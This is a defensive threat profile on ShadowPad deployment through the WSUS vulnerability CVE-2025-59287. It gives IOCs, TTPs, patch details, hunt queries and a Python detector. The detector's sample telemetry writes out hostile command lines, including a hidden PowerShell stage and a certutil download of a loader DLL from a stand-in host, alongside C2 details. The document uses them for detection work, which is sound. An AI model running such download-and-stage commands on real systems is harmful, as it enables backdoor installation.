Rapid ShadowPad Deployment via WSUS Vulnerability
Targeted Sectors
· Manufacturing (heavily targeted, especially firms in aviation and aerospace supply chains)
· Telecommunications
· Government
o Public Services
o Defense and Military
o Research Institutes (specifically a Taiwanese government-affiliated advanced computing research institute)
o Critical Infrastructure (government entities managing energy and power grids, such as the Indian State Load Despatch Centres (SLDCs))
o Municipal Government
o State Government
· Finance and Banking
· Energy (including critical infrastructure firms)
· Research and Education
· Healthcare and Pharmaceuticals
· Transportation
· Publishing
· Mining
· High-tech
Countries
· Global
BLUF
Threat actors aligned with Chinese state interests are exploiting CVE-2025-59287, a recently disclosed unauthenticated Remote Code Execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS), to gain system-level access on update servers and deploy the modular ShadowPad backdoor, which is loaded through DLL sideloading to evade detection. Because a WSUS server sits in a trusted position relative to every client it manages, a compromised server should be handled as a domain-wide incident rather than a single-host infection.
Date of First Reported Activity
· December 8-9, 2025.
Date of Last Reported Activity Update
· December 9, 2025
Suspected APT groups
No group has been definitively attributed; the suspected groups are:
· APT41
o Also known by names such as Winnti, Barium, Wicked Panda, Bronze Atlas, and Earth Baku. This group is widely documented for its use of ShadowPad for both espionage and financially motivated operations.
· APT10 also known as MenuPass.
· APT23 also known as Tonto Team.
· Earth Lusca also known as Aquatic Panda.
· PLA-affiliated clusters: the actors are broadly linked to China's Ministry of State Security (MSS) and People's Liberation Army (PLA) intelligence apparatus.
Associated Criminal Organization Names
· None specified
Malware Names
· ShadowPad (modular backdoor)
· BURNBOOK
· MISTPEN (droppers/loaders)
Malware Samples
ShadowPad
· SHA-256: e1bdb6a878dc5a81a74f7178259571d6c1c89fd8163185e6ccc61732d64b6338
· VirusTotal: hxxps://www.virustotal.com/gui/file/e1bdb6a878dc5a81a74f7178259571d6c1c89fd8163185e6ccc61732d64b6338
BURNBOOK
· SHA-256: d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
· VirusTotal: hxxps://www.virustotal.com/gui/file/d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
MISTPEN
· SHA-256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
· VirusTotal: hxxps://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
IOCs
C2 IP address used in the WSUS campaign
· 149.28.78[.]189:42306
C2 domains (older ShadowPad campaigns)
· dscriy.chtq[.]net
· cybaq.chtq[.]net
Host and network behaviours
· certutil or curl execution on WSUS servers fetching secondary payloads from external URLs or IP addresses.
· Unsigned DLLs dropped next to legitimate signed executables so that the executable sideloads the ShadowPad payload.
· Encrypted HTTP(S) and WebSocket communications to C2 infrastructure.
CVE-2025-59287
Microsoft Windows Server Update Services (WSUS) RCE: deserialization of untrusted data in the WSUS web services, reachable without authentication by anything that can connect to the WSUS listener ports (TCP 8530 for HTTP, 8531 for HTTPS). Only servers with the WSUS Server Role installed are affected. Microsoft released the fix out of band on October 23, 2025 (a restart is required after installation), and CISA added the CVE to its Known Exploited Vulnerabilities catalog. Servers that cannot be patched immediately should have the WSUS role disabled or inbound 8530/8531 blocked at the host firewall.
CVSS v3.1 Vector
· 9.8 (Critical): AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nessus Plugin IDs
· Windows Server 2012: 271441
· Windows Server 2012 R2: 271435
· Windows Server 2016: 271439
· Windows Server 2019: 271437
· Windows Server 2022: 271438
· Windows Server 2022 23H2: 271436
· Windows Server 2025: 271440
TTPs
· T1190: Exploit Public-Facing Application: exploitation of CVE-2025-59287 on Internet- or network-reachable WSUS servers.
· T1059.001: Command and Scripting Interpreter: PowerShell: PowerShell-based tooling for initial post-exploitation actions, launched from the WSUS web service process.
· T1574.002: Hijack Execution Flow: DLL Side-Loading: primary method for executing ShadowPad covertly under a legitimate signed executable.
· T1105: Ingress Tool Transfer: use of built-in utilities such as certutil and curl to fetch the loader and payload from remote servers.
· T1071.001: Application Layer Protocol: Web Protocols: HTTP(S) and WebSocket for C2 communications.
Suggested Rules / potential hunts
Suggested Suricata Rules (network)
· Alert on any connection from WSUS server addresses to 149.28.78[.]189 on TCP 42306, and on DNS queries or TLS SNI for the chtq[.]net domains.
· Alert on outbound HTTP from WSUS servers carrying a curl User-Agent or the Microsoft-CryptoAPI User-Agent that certutil -urlcache sends, to destinations other than Microsoft Update and the configured upstream WSUS server.
· Detect outbound connections from WSUS servers that do not match expected update traffic (Microsoft Update over TCP 443, upstream WSUS over 8530/8531).
Suggested Sentinel Rules (endpoint)
· In DeviceProcessEvents (Defender for Endpoint) or SecurityEvent 4688 on WSUS hosts, alert when the parent is the WSUS IIS worker process (w3wp.exe under the WsusPool application pool) or WsusService.exe and the child is cmd.exe, powershell.exe, curl.exe or certutil.exe; the exploit executes inside the WSUS web service, so this parent-child pair is the highest-fidelity signal.
· Alert on certutil or curl on WSUS servers whose command line contains an external URL or IP address. The observed chain is typically w3wp.exe > cmd.exe > powershell.exe > certutil.exe, so match on process ancestry rather than only the direct parent.
· Look for deviations from normal DLL loading (Sysmon Event 7) on WSUS hosts: a legitimate signed executable loading an unsigned DLL from its own directory in a user-writable path is the ShadowPad sideloading pattern.
Suggested Splunk Hunts
index=windows source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ((Image IN ("*\\curl.exe", "*\\certutil.exe") CommandLine IN ("*http://*", "*https://*")) OR (Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\curl.exe", "*\\certutil.exe") ParentImage IN ("*\\w3wp.exe", "*\\WsusService.exe"))) | table _time, host, User, ParentImage, Image, CommandLine
Hunt for Sysmon EventCode=3, firewall or NetFlow records showing outbound connections from WSUS servers to destinations other than Microsoft Update and the configured upstream WSUS server, and match them against the C2 IOC above (149.28.78[.]189 on TCP 42306).
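The hunts above each key on a single parent-child pair or a single command line, which misses that the exploit produces a chain (w3wp.exe > cmd.exe > powershell.exe > certutil.exe) where the interesting process is several hops below the WSUS worker. The script below is an added example written for this profile, not code from the original advisory, AhnLab or any other referenced vendor. It reconstructs process ancestry from Sysmon-style events and applies the four signals the TTPs and rules sections describe: shells descended from the WSUS processes, certutil/curl with an external URL, connections to the campaign C2, and an unsigned DLL loaded from a process's own writable directory (a sideloading heuristic). Every event, GUID, path and the 203.0.113.10 download host is constructed; only 149.28.78[.]189:42306 is the advisory's IOC.

```python
"""Detection logic for the WSUS -> ShadowPad chain over Sysmon-style events.

Added example for this profile; not vendor code. Events mimic Sysmon Event IDs 1
(process create), 3 (network connect) and 7 (image load) from a WSUS host. Field
names follow Sysmon; GUIDs, paths and the download host are constructed.
"""
import ntpath
import re

C2_IOCS = {("149.28.78.189", 42306)}                 # advisory IOC (real)
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}       # WSUS IIS worker / service
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
URL_RE = re.compile(r"https?://\S+|\b\d{1,3}(?:\.\d{1,3}){3}\b", re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def base(path):
    return ntpath.basename(path).lower()


def ancestry(guid, procs):
    """Walk ParentProcessGuid links; return parent image basenames, nearest first."""
    chain, seen, ev = [], {guid}, procs.get(guid)
    while ev is not None:
        chain.append(base(ev["ParentImage"]))
        pg = ev["ParentProcessGuid"]
        if pg in seen:          # guard against malformed/cyclic data
            break
        seen.add(pg)
        ev = procs.get(pg)      # stops at a parent we never saw created
    return chain


def detect(events):
    """Return (rule, image, detail) tuples for every signal that fires."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] == 1:
            img = base(e["Image"])
            chain = ancestry(e["ProcessGuid"], procs)
            if img in SUSPICIOUS_CHILDREN and WSUS_PARENTS & set(chain):
                findings.append(("WSUS_SPAWN", img, " > ".join(reversed(chain)) + " > " + img))
            if img in DOWNLOADERS and URL_RE.search(e["CommandLine"]):
                findings.append(("DOWNLOADER_URL", img, e["CommandLine"]))
        elif e["EventID"] == 3:
            key = (e["DestinationIp"], int(e["DestinationPort"]))
            if key in C2_IOCS:
                findings.append(("C2_IOC", base(e["Image"]), "%s:%d" % key))
        elif e["EventID"] == 7:
            loader_dir = ntpath.dirname(e["Image"]).lower()
            dll_dir = ntpath.dirname(e["ImageLoaded"]).lower()
            unsigned = str(e.get("Signed", "false")).lower() != "true"
            # heuristic: unsigned DLL beside the loading EXE, outside trusted install dirs
            if unsigned and loader_dir == dll_dir and not loader_dir.startswith(TRUSTED_DIRS):
                findings.append(("SIDELOAD", base(e["Image"]), e["ImageLoaded"]))
    return findings


def summarize(events):
    """Rule names in firing order, for a quick triage readout."""
    return [rule for rule, _, _ in detect(events)]


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A}", "ParentProcessGuid": "{ROOT}",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'w3wp.exe -ap "WsusPool"'},
    {"EventID": 1, "ProcessGuid": "{B}", "ParentProcessGuid": "{A}",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"cmd.exe /c powershell.exe -nop -w hidden -File C:\ProgramData\stage.ps1"},
    {"EventID": 1, "ProcessGuid": "{C}", "ParentProcessGuid": "{B}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -File C:\ProgramData\stage.ps1"},
    {"EventID": 1, "ProcessGuid": "{D}", "ParentProcessGuid": "{C}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://203.0.113.10/loader.dll C:\ProgramData\Update\helper.dll"},
    # benign: an admin checking a certificate from an interactive shell (must not fire)
    {"EventID": 1, "ProcessGuid": "{F}", "ParentProcessGuid": "{ROOT}",
     "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certutil.exe -verify C:\Temp\server.cer"},
    # image loads: sideload host in a writable dir vs. normal system DLL load
    {"EventID": 7, "ProcessGuid": "{E}", "Image": r"C:\ProgramData\Update\host.exe",
     "ImageLoaded": r"C:\ProgramData\Update\helper.dll", "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "ProcessGuid": "{S}", "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true", "SignatureStatus": "Valid"},
    # network: sideloaded host beacons to the C2; WSUS talks to its upstream normally
    {"EventID": 3, "ProcessGuid": "{E}", "Image": r"C:\ProgramData\Update\host.exe",
     "DestinationIp": "149.28.78.189", "DestinationPort": "42306"},
    {"EventID": 3, "ProcessGuid": "{W}", "Image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": "8530"},
]

if __name__ == "__main__":
    for rule, image, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:15} {image:16} {detail}")
```

Feeding real Sysmon data means converting the XML or EVTX records into dicts with the same field names; the ancestry walk only needs Event ID 1 for every process on the box since boot, so back-fill from the event log rather than from the current process list, which will not contain the short-lived cmd.exe and powershell.exe instances.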
Delivery Method
· Network exploitation of the vulnerable WSUS service, followed by file transfer of malware loaders
Email Samples
· Not applicable/available for this network exploitation method.
References
VirusTotal
· hxxps://www.virustotal.com/gui/file/e1bdb6a878dc5a81a74f7178259571d6c1c89fd8163185e6ccc61732d64b6338
· hxxps://www.virustotal.com/gui/file/d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
· hxxps://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
AhnLab Security Intelligence Center (ASEC) Analysis
· hxxps://asec.ahnlab.com/en/91166/
The Hacker News
· hxxps://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
Hivepro
· hxxps://hivepro.com/threat-advisory/shadowpad-gatecrashes-the-enterprise-by-hijacking-wsus-vulnerability/
Petri IT
· hxxps://petri.com/wsus-rce-exploit-shadowpad-backdoor-attack/
NVD
· hxxps://nvd.nist.gov/vuln/detail/CVE-2025-59287
Microsoft
· hxxps://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287
CISA
· hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-59287
Patch Information
· KB5070882 (Windows Server 2016, OS build 14393.8524, out-of-band, October 23, 2025): hxxps://support.microsoft.com/en-us/topic/october-23-2025-kb5070882-os-build-14393-8524-out-of-band-3400c459-db78-48bc-ae69-f61bff15ea7c
· The MSRC entry for CVE-2025-59287 (linked above) lists the corresponding out-of-band packages for the other supported Windows Server versions; a restart is required after installation.